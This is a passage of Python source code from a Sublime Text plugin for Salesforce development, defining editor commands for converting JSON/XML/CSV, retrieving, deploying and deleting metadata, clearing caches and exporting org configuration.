sublime.active_window().show_input_panel("Input Class Name: ",
"JSON2Apex", self.on_input_name, None, None)
def on_input_name(self, name):
if not name: name = "JSON2Apex"
# Start converting
snippet = JSONConverter(scope="global").convert2apex(name, self.data).snippet
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "JSON2APEX",
"input": snippet
})
class JsonToXml(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
data = json.loads(self.selection)
result = xmltodict.unparse(data)
except ValueError as ve:
return Printer.get("error").write(str(ve))
except xml.parsers.expat.ExpatError as ex:
return Printer.get("error").write(str(ex))
new_view = sublime.active_window().new_file()
new_view.set_syntax_file("Packages/XML/XML.tmLanguage")
new_view.run_command("new_view", {
"name": "JSON2XML",
"input": util.format_xml(result).decode("UTF-8")
})
class JsonToCsv(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
_list = json.loads(self.selection)
if not isinstance(_list, list):
msg = "Your input is not valid json list"
return Printer.get("error").write(msg)
except ValueError as ve:
return Printer.get("error").write(str(ve))
except xml.parsers.expat.ExpatError as ex:
return Printer.get("error").write(str(ex))
new_view = sublime.active_window().new_file()
new_view.run_command("new_view", {
"name": "JSON2CSV.csv",
"input": util.json2csv(_list)
})
class XmlToJson(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
result = xmltodict.parse(self.selection)
except xml.parsers.expat.ExpatError as ex:
message = "You should open a XML file or choose any valid XML content"
if "line 1, column 0" in str(ex):
return Printer.get("error").write(message)
return Printer.get("error").write(str(ex))
new_view = sublime.active_window().new_file()
new_view.run_command("new_view", {
"name": "XML2JSON",
"input": json.dumps(result, indent=4)
})
class XmlFormat(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
formatter = xmlformatter.Formatter(indent=4)
formatted_xml = formatter.format_string(self.selection)
except xml.parsers.expat.ExpatError as ex:
message = "You should open a XML file or choose any valid XML content"
if "line 1, column 0" in str(ex):
return Printer.get("error").write(message)
return Printer.get("error").write(str(ex))
if not self.choose_all:
new_view = sublime.active_window().new_file()
new_view.set_syntax_file("Packages/XML/XML.tmLanguage")
new_view.run_command("new_view", {
"name": "XMLFormat",
"input": formatted_xml.decode("utf-8")
})
else:
self.view.window().run_command("new_dynamic_view", {
"view_id": self.view.id(),
"view_name": self.view.name(),
"point": 0,
"erase_all": True,
"input": formatted_xml.decode("utf-8")
})
class DiffWithServer(sublime_plugin.TextCommand):
def run(self, edit, switch=True, source_org=None):
if not source_org:
source_org = self.settings["default_project_name"]
if switch:
return self.view.window().run_command("switch_project", {
"callback_options": {
"callback_command": "diff_with_server",
"args": {
"switch": False,
"source_org": source_org
}
}
})
file_name = self.view.file_name()
attr = util.get_component_attribute(file_name, False, reload_cache=True)[0]
        # If this component does not exist in the chosen project, just stop
        if not attr:
            Printer.get("error").write("This component does not exist in the chosen project")
return util.switch_project(source_org)
processor.handle_diff_with_server(attr, file_name, source_org)
def is_enabled(self):
self.file_name = self.view.file_name()
if not self.file_name:
return False
self.settings = context.get_settings()
self.attributes = util.get_file_attributes(self.file_name)
if self.attributes["metadata_folder"] not in ["classes", "triggers", "pages", "components"]:
return False
return True
def is_visible(self):
return self.is_enabled()
class DiffWithOtherFile(sublime_plugin.TextCommand):
def run(self, edit):
self.other_open_files = []
for v in self.views:
if v.id() != self.view.id():
if not v.file_name():
continue
self.other_open_files.append(v.file_name())
sublime.active_window().show_quick_panel(self.other_open_files, self.on_done, 1)
def on_done(self, index):
if index == -1:
return
from .salesforce.lib import diff
diff.diff_files(self.view.file_name(), self.other_open_files[index])
def is_enabled(self):
self.views = sublime.active_window().views()
return len(self.views) > 1
def is_visible(self):
view = sublime.active_window().active_view()
return view.file_name() is not None
class ShowMyPanel(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ShowMyPanel, self).__init__(*args, **kwargs)
def run(self, panel):
Printer.get(panel).show_panel()
class ToggleMetadataObjects(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ToggleMetadataObjects, self).__init__(*args, **kwargs)
def run(self, callback_options={}):
self.settings = context.get_settings()
self.callback_options = callback_options
described_metadata = util.get_described_metadata(self.settings)
if not described_metadata:
return self.window.run_command("describe_metadata", {
"callback_options": {
"callback_command": "toggle_metadata_objects"
}
})
self.metadata_objects = described_metadata["metadataObjects"]
smo = self.settings["subscribed_metadata_objects"]
        # Key pair between item and metadataObjects
self.item_property = {}
# Add all metadata objects to list
has_subscribed = False
subscribed_items = []
        unsubscribed_items = []
for mo in self.metadata_objects:
if mo["xmlName"] in smo:
item = "%s[√] %s" % (" " * 4, mo["xmlName"])
subscribed_items.append(item)
has_subscribed = True
else:
item = "%s[x] %s" % (" " * 4, mo["xmlName"])
                unsubscribed_items.append(item)
self.item_property[item] = mo["xmlName"]
# Add item `Select All` to list
item_all = "[%s] All" % ("√" if has_subscribed else "x")
self.items = [item_all]
self.item_property[item_all] = [m["xmlName"] for m in self.metadata_objects]
# Add subscribed ones and unsubscribed ones to list
self.items.extend(sorted(subscribed_items))
        self.items.extend(sorted(unsubscribed_items))
self.window.show_quick_panel(self.items, self.on_done,
sublime.MONOSPACE_FONT)
def on_done(self, index):
if index == -1:
if "callback_command" in self.callback_options:
self.window.run_command(self.callback_options["callback_command"])
return
# Get chosen type
chosen_item = self.items[index]
chosen_metadata_objects = self.item_property[chosen_item]
# Get already subscribed metadata objects
s = sublime.load_settings(context.TOOLING_API_SETTINGS)
projects = s.get("projects")
default_project = projects[self.settings["default_project_name"]]
if "subscribed_metadata_objects" in default_project:
subscribed_metadata_objects = default_project["subscribed_metadata_objects"]
else:
subscribed_metadata_objects = []
# Assign new subscribed metadata objects to subscribed list
if isinstance(chosen_metadata_objects, list):
            # If already subscribed to all and the `All` item is chosen again,
            # all subscribed ones will be unsubscribed
if len(subscribed_metadata_objects) == len(self.metadata_objects):
subscribed_metadata_objects = []
else:
subscribed_metadata_objects = chosen_metadata_objects
elif isinstance(chosen_metadata_objects, str):
if chosen_metadata_objects in subscribed_metadata_objects:
subscribed_metadata_objects.remove(chosen_metadata_objects)
else:
subscribed_metadata_objects.append(chosen_metadata_objects)
default_project["subscribed_metadata_objects"] = subscribed_metadata_objects
projects[self.settings["default_project_name"]] = default_project
# Save the updated settings
s.set("projects", projects)
sublime.save_settings(context.TOOLING_API_SETTINGS)
sublime.set_timeout(lambda: sublime.active_window().run_command("toggle_metadata_objects", {
"callback_options": self.callback_options
}), 10)
class ReloadSobjectCacheCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ReloadSobjectCacheCommand, self).__init__(*args, **kwargs)
def run(self):
message = "Are you sure you really want to update sObject cache?"
if not sublime.ok_cancel_dialog(message, "Confirm Reload?"): return
processor.handle_reload_sobjects_completions()
class ReloadSymbolTableCacheCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ReloadSymbolTableCacheCommand, self).__init__(*args, **kwargs)
def run(self):
message = "Are you sure you really want to reload symbol table cache?"
if not sublime.ok_cancel_dialog(message, "Confirm Reload"):
return
processor.handle_reload_symbol_tables()
class ClearSessionCacheCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ClearSessionCacheCommand, self).__init__(*args, **kwargs)
def run(self):
message = "Are you sure you really want to clear session?"
if not sublime.ok_cancel_dialog(message, "Confirm Clear?"): return
settings = context.get_settings()
session_path = settings["workspace"] + "/.config/session.json"
try:
os.remove(session_path)
sublime.status_message("Session cache is cleared")
except:
sublime.status_message("Session cache clear failed")
class ClearCacheCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ClearCacheCommand, self).__init__(*args, **kwargs)
def run(self, cache_name):
self.cache_name = cache_name
self.cache_settings = self.cache_name + ".sublime-settings"
self.caches = util.get_sobject_caches(self.cache_settings)
if not self.caches:
Printer.get('error').write("No cache already")
return
self.window.show_quick_panel(self.caches, self.on_done)
def on_done(self, index):
if index == -1: return
message = "Are you sure you really want to clear this cache?"
if not sublime.ok_cancel_dialog(message, "Confirm Clear"): return
util.clear_cache(self.caches[index][1], self.cache_settings)
sublime.set_timeout(lambda: sublime.active_window().run_command("clear_cache", {
"cache_name": self.cache_name
}), 10)
class Convert15Id218Id(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(Convert15Id218Id, self).__init__(*args, **kwargs)
def run(self):
self.window.show_input_panel("Input 15 Id: ",
"", self.on_input, None, None)
def on_input(self, input):
c18Id = util.convert_15_to_18(input)
Printer.get('log').write("Converted 18 Digit Id: " + c18Id);
class DecodeUrl(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DecodeUrl, self).__init__(*args, **kwargs)
def run(self):
self.window.show_input_panel("Input your URL to be decoded: ",
"", self.on_input, None, None)
def on_input(self, input):
decodedUrl = urllib.request.unquote(input)
Printer.get('log').write("Decoded URL: " + decodedUrl);
class EncodeUrl(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(EncodeUrl, self).__init__(*args, **kwargs)
def run(self):
self.window.show_input_panel("Input your URL to be encoded: ",
"", self.on_input, None, None)
def on_input(self, input):
encodedUrl = urllib.request.quote(input)
Printer.get('log').write("Encoded URL: " + encodedUrl);
class GenerateSoqlCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(GenerateSoqlCommand, self).__init__(*args, **kwargs)
def run(self):
sobjects_describe = util.populate_sobjects_describe()
self.sobjects = sorted(sobjects_describe.keys())
self.window.show_quick_panel(self.sobjects, self.on_done)
def on_done(self, index):
if index == -1: return
self.sobject = self.sobjects[index]
self.filters = ["all", "updateable", "createable", "custom"]
self.display_filters = [a.capitalize() for a in self.filters]
sublime.set_timeout(lambda: self.window.show_quick_panel(self.display_filters, self.on_choose_action), 10)
def on_choose_action(self, index):
if index == -1: return
processor.handle_generate_sobject_soql(self.sobject, self.filters[index])
class ExportQueryToCsv(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportQueryToCsv, self).__init__(*args, **kwargs)
def run(self, tooling=False):
self.tooling = tooling
sublime.active_window().show_input_panel('Input Your %s SOQL:' %
('Tooling' if tooling else ''), "", self.on_input_soql, None, None)
def on_input_soql(self, soql):
self.soql = soql.strip()
# Check whether the soql is valid and not parent-to-child query
match = re.match("[\\n\\s]*SELECT\\s+[*\\w\\n,.:_\\s()]+?\\s+FROM\\s+[1-9_a-zA-Z]+",
self.soql, re.IGNORECASE)
if not match:
Printer.get("error").write("Your input SOQL is not valid")
if sublime.ok_cancel_dialog("Want to try again?"):
self.window.show_input_panel('Input Your SOQL:',
"", self.on_input_soql, None, None)
return
# This feature does not support parent to child query
matchs = re.findall('SELECT\\s+', match.group(0), re.IGNORECASE)
if len(matchs) > 1:
Printer.get("error").write("This feature does not support parent-to-child query")
if sublime.ok_cancel_dialog("Want to try again?"):
self.window.show_input_panel('Input Your SOQL:',
"", self.on_input_soql, None, None)
return
# Parse the sObject Name for CSV name
matchstr = match.group(0)
self.sobject = matchstr[matchstr.rfind(" ") + 1:]
sublime.active_window().show_input_panel('Input CSV Name:',
self.sobject, self.on_input_name, None, None)
def on_input_name(self, name):
if not name: return
processor.handle_export_query_to_csv(self.tooling, self.soql, name)
class ExportDataTemplateCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportDataTemplateCommand, self).__init__(*args, **kwargs)
def run(self, vertical=True):
self.vertical = vertical
self.sobject_recordtypes_attr = processor.populate_sobject_recordtypes()
if not self.sobject_recordtypes_attr: return # Network Issue Cause
self.sobject_recordtypes = sorted(list(self.sobject_recordtypes_attr.keys()))
self.window.show_quick_panel(self.sobject_recordtypes, self.on_choose_recordtype)
def on_choose_recordtype(self, index):
if index == -1: return
# Get chosen item, sobject name and recordtype id
sobject_recordtype = self.sobject_recordtypes[index]
sobject = sobject_recordtype.split(",")[0].strip()
recordtype_name = sobject_recordtype.split(",")[1].strip()
recordtype_id = self.sobject_recordtypes_attr[sobject_recordtype]
# handle this describe request
processor.handle_export_data_template_thread(sobject,
recordtype_name, recordtype_id, self.vertical)
def is_enabled(self):
return util.check_action_enabled()
class ExecuteRestTest(sublime_plugin.TextCommand):
def run(self, edit):
self.items = ["Get", "Post", "Put", "Patch", "Delete", "Tooling Query",
"Query", "Query All", "Search", "Quick Search",
"Head", "Retrieve Body"]
        self.view.show_popup_menu(self.items, self.on_choose_action)
def on_choose_action(self, index):
if index == -1: return
self.chosen_action = self.items[index]
if self.chosen_action in ["Post", "Put", "Patch"]:
self.view.window().show_input_panel("Input JSON Body: ", "", self.on_input, None, None)
else:
processor.handle_execute_rest_test(self.chosen_action, self.sel)
def on_input(self, data):
try:
data = json.loads(data) if data else None
except ValueError as ve:
Printer.get('error').write(str(ve))
if not sublime.ok_cancel_dialog("Do you want to try again?", "Yes?"): return
self.view.window().show_input_panel("Input JSON Body: ",
"", self.on_input, None, None)
return
processor.handle_execute_rest_test(self.chosen_action, self.sel, data)
def is_enabled(self):
self.sel = self.view.substr(self.view.sel()[0])
if not self.sel: return False
return True
class GotoComponentCommand(sublime_plugin.TextCommand):
"""
    Move the cursor to a class name, hold Shift and double-click the left mouse
    button to open the class file; you can customize the binding in the mousemap file
"""
def run(self, edit, is_background=False, allowed_folders=None):
sel = self.view.sel()[0]
sel_text = self.view.substr(self.view.word(sel.begin()))
settings = context.get_settings()
for ct in settings["subscribed_metadata_objects"]:
if "suffix" not in settings[ct]:
continue
suffix = settings[ct]["suffix"]
folder = settings[ct]["directoryName"]
target_file = os.path.join(settings["workspace"] + \
"/src/%s/%s.%s" % (folder, sel_text, suffix)
)
if os.path.isfile(target_file):
if allowed_folders:
if folder in allowed_folders:
self.view.window().open_file(target_file)
else:
self.view.window().open_file(target_file)
else:
sublime.status_message("You may forget to download the code")
if is_background: self.view.window().focus_view(self.view)
class SetCheckPointCommand(sublime_plugin.TextCommand):
def run(self, edit, mark):
sel = [s for s in self.view.sel()]
self.view.add_regions(mark, sel, "invalid", "dot",
sublime.DRAW_SOLID_UNDERLINE | sublime.DRAW_EMPTY_AS_OVERWRITE)
class RemoveCheckPointCommand(sublime_plugin.TextCommand):
def run(self, edit, mark):
self.view.erase_regions(mark)
class ViewCodeCoverageCommand(sublime_plugin.TextCommand):
def run(self, edit):
processor.handle_fetch_code_coverage(self.attributes["name"], self.body)
def is_enabled(self):
# Must Be File
if not self.view.file_name():
return False
self.file_name = self.view.file_name()
# Must be valid component
if not util.check_enabled(self.file_name):
return False
# Must be class or trigger
self.attributes = util.get_file_attributes(self.file_name)
if not self.attributes["extension"]:
return False
if self.attributes["metadata_folder"] not in ["classes", "triggers"]:
return False
# Can't be Test Class
with open(self.file_name, encoding="utf-8") as fp:
self.body = fp.read()
if "@istest" in self.body.lower():
return False
return True
def is_visible(self):
return self.is_enabled()
class ViewSelectedCodeCoverageCommand(sublime_plugin.TextCommand):
def run(self, edit):
# Keep all open views
openViewIds = [v.id() for v in sublime.active_window().views()]
# Open the related code file
self.view.run_command("goto_component", {
"is_background": False,
"allowed_folders": ["classes", "triggers"]
})
# 1. Open the view of related code file
# 2. Run command `view_code_coverage` to open coverage view
# 3. Close the view of related code file
# 4. Focus on the coverage view
view = sublime.active_window().active_view()
view.run_command("view_code_coverage")
coverage_view = sublime.active_window().active_view()
# If there is no available code file
if coverage_view.id() == view.id():
return
if view.id() not in openViewIds:
sublime.active_window().focus_view(view)
sublime.active_window().run_command("close")
# Move focus to the coverage view
sublime.active_window().focus_view(coverage_view)
class NewViewCommand(sublime_plugin.TextCommand):
"""
Create a new view with specified input
@input: user specified input
Usage:
sublime.active_window().run_command("new_view", {
"name": "ViewName",
"input": "Example"
})
"""
def run(self, edit, point=0, name="", input=""):
view = sublime.active_window().active_view()
view.set_scratch(True)
view.set_name(name)
view.insert(edit, point, input)
class NewDynamicViewCommand(sublime_plugin.TextCommand):
"""
Create a new view with specified input
@input: user specified input
Usage:
sublime.active_window().run_command("new_dynamic_view", {
"view_id": "view_id",
"point": 0,
"input": "Example"
})
"""
def run(self, edit, view_id=None, view_name="", input="", point=0, erase_all=False):
        # Get the view whose id matches the view_id parameter
view = sublime.active_window().active_view()
if view_id and not view.id() == view_id:
for v in sublime.active_window().views():
if v.id() == view_id:
view = v
view.set_scratch(True)
view.set_name(view_name)
if erase_all: view.erase(edit, sublime.Region(0, view.size()))
view.insert(edit, point, input)
class RefreshFolder(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(RefreshFolder, self).__init__(*args, **kwargs)
def run(self, dirs):
message = "Are you sure you really want to refresh these folders"
if sublime.ok_cancel_dialog(message, "Refresh Folders"):
processor.handle_refresh_folder(self.types)
def is_visible(self, dirs):
if not dirs: return False
self.types = util.build_folder_types(dirs)
if not self.types: return False
return True
class RetrieveMetadataCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(RetrieveMetadataCommand, self).__init__(*args, **kwargs)
def run(self, retrieve_all=True):
message = "Are your sure you really want to continue?"
if not sublime.ok_cancel_dialog(message, "Retrieve Metadata"): return
settings = context.get_settings()
types = {}
if not retrieve_all:
types = {
"CustomObject": ["*"],
"Workflow": ["*"]
}
else:
for m in settings["all_metadata_objects"]:
types[m] = ["*"]
processor.handle_refresh_folder(types, not retrieve_all)
class RenameMetadata(sublime_plugin.TextCommand):
def run(self, edit):
self.view.window().show_input_panel("Input New Name",
self.filename, self.on_input, None, None)
def on_input(self, new_name):
        if not new_name or not re.match(r"\w+[a-zA-Z0-9]+", new_name):
Printer.get('error').write("Input name is not valid")
return
processor.handle_rename_metadata(self.file_name, self.xml_name, self.filename, new_name)
def is_enabled(self):
if not self.view or not self.view.file_name(): return False
self.settings = context.get_settings()
self.file_name = self.view.file_name()
base, filename = os.path.split(self.file_name)
base, folder = os.path.split(base)
if folder not in self.settings["all_metadata_folders"]: return False
if not util.check_enabled(self.view.file_name(), check_cache=False):
return False
self.filename = filename.split(".")[0]
self.xml_name = self.settings[folder]["xmlName"]
return True
class RetrieveFileFromServer(sublime_plugin.TextCommand):
"""
Retrieve Single File From Salesforce via Metadata API
"""
def run(self, edit, switch=True):
files = [self.view.file_name()]
sublime.active_window().run_command("retrieve_files_from_server", {
"files": files,
"switch": switch
})
def is_enabled(self):
if not self.view or not self.view.file_name(): return False
self.settings = context.get_settings()
attributes = util.get_file_attributes(self.view.file_name())
metadata_folder = attributes["metadata_folder"]
if metadata_folder not in self.settings["all_metadata_folders"]: return False
if not util.check_enabled(self.view.file_name(), check_cache=False):
return False
return True
def is_visible(self):
return self.is_enabled()
class RetrieveFilesFromServer(sublime_plugin.WindowCommand):
"""
Retrieve List of files from Salesforce via Metadata API
"""
def __init__(self, *args, **kwargs):
super(RetrieveFilesFromServer, self).__init__(*args, **kwargs)
def run(self, files, switch=True, source_org=None, confirmed=False, extract_to=None):
# Prevent duplicate confirmation
if not confirmed:
_message = "Confirm retrieving %s from server?" % (
"these files" if len(files) > 1 else "this file"
)
if not sublime.ok_cancel_dialog(_message, "Confirm?"):
return
settings = context.get_settings()
if not extract_to:
extract_to = settings["workspace"]
if switch:
return self.window.run_command("switch_project", {
"callback_options": {
"callback_command": "retrieve_files_from_server",
"args": {
"files": files,
"switch": False,
"source_org": settings["default_project_name"],
"confirmed": True,
"extract_to": extract_to
}
}
})
types = {}
for _file in files:
attributes = util.get_file_attributes(_file)
name = attributes["name"]
metadata_folder = attributes["metadata_folder"]
metadata_object_attr = settings[metadata_folder]
metadata_object = metadata_object_attr["xmlName"]
# If file is in folder, we need to add folder/
if metadata_object_attr["inFolder"] == "true":
name = "%s/%s" % (attributes["folder"], attributes["name"])
# If file is AuraDefinitionBundle, we need to add folder
if metadata_folder in ["aura", "lwc"]:
name = "%s" % attributes["folder"]
if metadata_object in types:
types[metadata_object].append(name)
else:
types[metadata_object] = [name]
processor.handle_retrieve_package(types, extract_to,
source_org=source_org, ignore_package_xml=True)
def is_visible(self, files):
if not files:
return False
settings = context.get_settings()
for _file in files:
if not os.path.isfile(_file):
continue # Ignore folder
metadata_folder = util.get_metadata_folder(_file)
if metadata_folder not in settings["all_metadata_folders"]: return False
if not util.check_enabled(_file, check_cache=False):
return False
return True
class CancelDeployment(sublime_plugin.TextCommand):
def run(self, edit):
processor.handle_cancel_deployment_thread(self.sel_text)
def is_enabled(self):
if len(self.view.sel()) == 0:
return False
region = self.view.sel()[0]
self.sel_text = self.view.substr(self.view.word(region.begin()))
return self.sel_text.startswith("0Af")
class DestructFileFromServer(sublime_plugin.TextCommand):
"""
Destruct the selected code from Salesforce and delete from local folder
"""
def run(self, edit):
files = [self.view.file_name()]
sublime.active_window().run_command("destruct_files_from_server", {
"files": files
})
def is_enabled(self):
if not self.view or not self.view.file_name(): return False
self.settings = context.get_settings()
metadata_folder = util.get_metadata_folder(self.view.file_name())
if metadata_folder not in self.settings["all_metadata_folders"]: return False
if not util.check_enabled(self.view.file_name(), check_cache=False):
return False
return True
def is_visible(self):
return self.is_enabled()
class DestructFilesFromServer(sublime_plugin.WindowCommand):
"""
Destruct the selected code files from Salesforce and delete from local folder via Metadata API
"""
def __init__(self, *args, **kwargs):
super(DestructFilesFromServer, self).__init__(*args, **kwargs)
def run(self, files):
_message = "Confirm destructing %s from server?" % (
"these files" if len(files) > 1 else "this file"
)
if sublime.ok_cancel_dialog(_message, "Confirm"):
processor.handle_destructive_files(files)
def is_visible(self, files):
if len(files) == 0: return False
self.settings = context.get_settings()
for _file in files:
if not os.path.isfile(_file):
continue # Ignore folder
_folder = util.get_metadata_folder(_file)
if _folder not in self.settings["all_metadata_folders"]: return False
if not util.check_enabled(_file, check_cache=False):
return False
return True
class DeployZip(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DeployZip, self).__init__(*args, **kwargs)
def run(self, zipfile_path=None, chosen_classes=[]):
self.zipfile_path = zipfile_path
self.chosen_classes = chosen_classes
if self.zipfile_path:
return self.execute_deploy()
path = sublime.get_clipboard()
if not path or not os.path.isfile(path): path = ""
if not path.endswith("zip"): path = ""
self.window.show_input_panel("Input Zip File Path:",
path, self.on_input, None, None)
def on_input(self, zipfile_path):
if not zipfile_path.endswith('.zip'):
return Printer.get("error").write("Invalid Zip File")
self.zipfile_path = zipfile_path
# Start deployment
self.execute_deploy()
def execute_deploy(self):
settings = context.get_settings()
deploy_options = settings["deploy_options"]
testLevel = deploy_options.get("testLevel", "NoTestRun")
if testLevel == "RunSpecifiedTests" and not self.chosen_classes:
return self.window.run_command("choose_test_classes", {
"callback_options": {
"callback_command": "deploy_zip",
"args": {
"zipfile_path": self.zipfile_path,
"chosen_classes": self.chosen_classes
}
}
})
processor.handle_deploy_thread(util.base64_encode(self.zipfile_path),
chosen_classes=self.chosen_classes)
class DeployOpenFilesToServer(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DeployOpenFilesToServer, self).__init__(*args, **kwargs)
def run(self, select_all=True):
# If deploy all open files
if select_all:
return sublime.active_window().run_command("deploy_files_to_server",
{"files": list(self.file_attributes.values())})
# If just deploy some files
if not hasattr(self, "chosen_files"):
self.chosen_files = []
self.populate_items()
self.window.show_quick_panel(self.items, self.on_choose)
def populate_items(self):
self.items = []
for fileName in list(self.file_attributes.keys()):
if fileName in self.chosen_files:
self.items.append("[√] %s" % fileName)
else:
self.items.append("[x] %s" % fileName)
def on_choose(self, index):
if index == -1:
chosen_files = []
for item in self.items:
if item.startswith("[√] "):
chosen_files.append(self.file_attributes[item[4:]])
if chosen_files:
sublime.active_window().run_command("deploy_files_to_server",
{"files": chosen_files}
)
return
# Get chosen file name
chosen_item = self.items[index]
chosen_file_name = chosen_item[4:]
# Add or remove chosen file from list
if chosen_file_name in self.chosen_files:
self.chosen_files.remove(chosen_file_name)
else:
self.chosen_files.append(chosen_file_name)
# Start next round
self.populate_items()
sublime.set_timeout(lambda: self.window.show_quick_panel(self.items,
self.on_choose, sublime.MONOSPACE_FONT), 10)
def is_enabled(self):
"""
1. You must have selected one file or more
        2. All selected files should be in predefined metadata folders
"""
# If no views, just disable this command
views = sublime.active_window().views();
if not views or len(views) == 0: return False
self.settings = context.get_settings()
self.file_attributes = {};
for _view in views:
_file = _view.file_name()
# Ignore folder
if not _file or not os.path.isfile(_file):
continue
attributes = util.get_file_attributes(_file)
# Ignore non-sfdc files
if attributes["metadata_folder"] not in self.settings["all_metadata_folders"]:
continue
self.file_attributes[attributes["fullName"]] = _file
# If there is no sfdc code file, just disable this command
if not self.file_attributes:
return False
return True
class DeployFileToServer(sublime_plugin.TextCommand):
def run(self, edit, switch=True):
files = [self.view.file_name()]
sublime.active_window().run_command("deploy_files_to_server", {
"files": files, "switch": switch
})
def is_enabled(self):
if not self.view or not self.view.file_name(): return False
self.settings = context.get_settings()
attributes = util.get_file_attributes(self.view.file_name())
if attributes["metadata_folder"] not in self.settings["all_metadata_folders"]:
return False
return True
def is_visible(self):
return self.is_enabled()
class DeployFileToThisServer(sublime_plugin.TextCommand):
"""
    Deploy an opened file to the currently active Salesforce org
"""
def run(self, edit):
files = [self.view.file_name()]
sublime.active_window().run_command("deploy_files_to_server", {
"files": files, "switch": False
})
def is_enabled(self):
return util.check_enabled(self.view.file_name(), check_cache=False)
def is_visible(self):
return self.is_enabled()
class DeployFilesToServer(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DeployFilesToServer, self).__init__(*args, **kwargs)
def run(self, files, switch=True, source_org=None, chosen_classes=[]):
settings = context.get_settings()
if not source_org:
source_org = settings["default_project_name"]
deploy_options = settings["deploy_options"]
testLevel = deploy_options.get("testLevel", "NoTestRun")
if testLevel == "RunSpecifiedTests" and not chosen_classes:
return self.window.run_command("choose_test_classes", {
"callback_options": {
"callback_command": "deploy_files_to_server",
"args": {
"files": files,
"switch": False,
"source_org": source_org
}
}
})
if switch:
return self.window.run_command("switch_project", {
"callback_options": {
"callback_command": "deploy_files_to_server",
"args": {
"files": files,
"switch": False,
"source_org": source_org
}
}
})
# Before deploy, save files to local
# Enhancement for issue SublimeApex#67
for _file in files:
view = util.get_view_by_file_name(_file)
if not view: continue
view.run_command("save")
# Keep the files to deploy
base64_encoded_zip = util.build_deploy_package(files)
processor.handle_deploy_thread(
base64_encoded_zip,
source_org=source_org,
chosen_classes=chosen_classes
)
def is_visible(self, files):
"""
1. You must have selected one file or more
        2. All selected files should be in predefined metadata folders
"""
if not files: return False
self.settings = context.get_settings()
for _file in files:
if not os.path.isfile(_file): continue # Ignore folder
attributes = util.get_file_attributes(_file)
if attributes["metadata_folder"] not in self.settings["all_metadata_folders"]:
return False
return True
class CopyFileToProject(sublime_plugin.TextCommand):
def run(self, edit, switch=True, source_org=None):
sublime.active_window().run_command("copy_files_to_project", {
"files": [self.view.file_name()]
})
def is_enabled(self):
return self.view.file_name() is not None
class CopyFilesToProject(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CopyFilesToProject, self).__init__(*args, **kwargs)
def run(self, files, switch=True, source_org=None):
settings = context.get_settings()
if not source_org:
source_org = settings["default_project_name"]
if switch:
return self.window.run_command("switch_project", {
"callback_options": {
"callback_command": "copy_files_to_project",
"args": {
"files": files,
"switch": False,
"source_org": source_org
}
}
})
target_dir = settings["workspace"]
util.copy_files(self.attributes, target_dir)
        # If it succeeds, just show the success message
Printer.get("log").write("Files are copied to " + source_org)
# we need to switch project back to original
if settings["switch_back_after_migration"]:
util.switch_project(source_org)
def is_enabled(self, files, **kwargs):
if not files: return False
self.settings = context.get_settings()
self.attributes = []
for _file in files:
if not os.path.isfile(_file): continue # Ignore folder
if _file.endswith("-meta.xml"): continue # Ignore meta file
attribute = util.get_file_attributes(_file)
if attribute["metadata_folder"] not in self.settings["all_metadata_folders"]:
continue
attribute["fileDir"] = _file
self.attributes.append(attribute)
if not self.attributes:
return False
return True
def is_visible(self, files, **kwargs):
return self.is_enabled(files)
class ExportProfile(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportProfile, self).__init__(*args, **kwargs)
def run(self):
import threading
thread = threading.Thread(target=util.export_profile_settings)
thread.start()
def is_enabled(self):
return util.check_action_enabled()
class ExportValidationRulesCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportValidationRulesCommand, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
workflow_path = settings["workspace"] + "/src/objects"
if not os.path.exists(workflow_path):
Printer.get('error').write(message.METADATA_CHECK)
return
processor.handle_export_validation_rules(settings)
def is_enabled(self):
return util.check_action_enabled()
class ExportCustomLablesCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportCustomLablesCommand, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
workspace = settings["workspace"]
lable_path = workspace + "/src/labels/CustomLabels.labels"
if not os.path.isfile(lable_path):
Printer.get('error').write(message.METADATA_CHECK)
return
outputdir = settings["workspace"] + "/.export/labels"
if not os.path.exists(outputdir): os.makedirs(outputdir)
lables = xmltodict.parse(open(lable_path, "rb").read())
util.list2csv(outputdir + "/Labels.csv", lables["CustomLabels"]["labels"])
def is_enabled(self):
return util.check_action_enabled()
class ExportWorkflowsCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportWorkflowsCommand, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
workspace = settings["workspace"]
workflow_path = workspace + "/src/workflows"
if not os.path.exists(workflow_path):
Printer.get('error').write(message.METADATA_CHECK)
return
processor.handle_export_workflows(settings)
def is_enabled(self):
return util.check_action_enabled()
class ExportCustomFieldCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportCustomFieldCommand, self).__init__(*args, **kwargs)
def run(self):
processor.handle_export_customfield()
def is_enabled(self):
